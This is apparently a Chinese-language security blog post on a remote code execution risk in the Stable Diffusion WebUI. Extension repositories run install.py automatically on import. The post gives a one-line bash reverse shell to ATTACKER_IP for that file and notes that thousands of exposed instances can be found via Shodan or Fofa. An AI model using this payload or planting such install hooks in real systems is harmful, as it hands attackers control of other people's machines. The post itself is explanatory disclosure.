Stable Diffusion WebUI RCE Vulnerability


目前最有名的 Stable Diffusion GUI 程式是由 AUTOMATIC1111 開發的
stable-diffusion-webui ,它強大且多功能的介面,吸引了非常多人的使用。

Stable Diffusion Web UI 支援透過 Extension 功能安裝第三方的套件,使用者僅需貼上對應的 GitHub Repository 即可安裝對應的套件。

透過這種方式安裝套件非常方便,但也有嚴重的安全隱患。這些套件都是透過 Python 撰寫而成,因此,駭客也可以自行準備一個惡意的腳本,並透過該 UI 載入,即可達成遠端指令執行 (RCE)。

Stable Diffusion Web UI 的套件格式為,一個 install.py 的腳本進行安裝相關操作,而主要的腳本則放在 scripts 資料夾中。而初次引入腳本的瞬間,系統會自動執行 install.py 的程式碼。因此,如果攻擊者準備好一個包含惡意腳本的 Repository,並引入,即可控制遠端的系統。

舉例來說,我們可以建立一個 Github Repository,並單純只放入 install.py,裡面寫入一個 Reverse Shell 的腳本。

import os

os.system("bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/8787 0>&1' &")

並操作 Stable Diffusion Web UI 進行引入的動作,當按下引入後,攻擊者的 IP 即可收到一個 Reverse Shell,也就代表我們已經順利的駭入這台電腦或伺服器了!

  • Demo: https://www.youtube.com/watch?v=yyjeMs1R8Ew

其實,這套 Web UI 預設是開在 127.0.0.1 僅供本地使用,不過許多人為了遠端存取,或是多人共用,因此將其直接開在廣域網路上。可怕的事情是,只要對整個網際網路開啟了 Web UI,駭客就可以輕易地奪走使用者的電腦或是伺服器!

透過 Shodan 或是 Fofa 等搜尋引擎更可以發現,數以千計的伺服器正開啟著這樣的服務對外,影響層面可能比想像中還要大。

,

發表迴響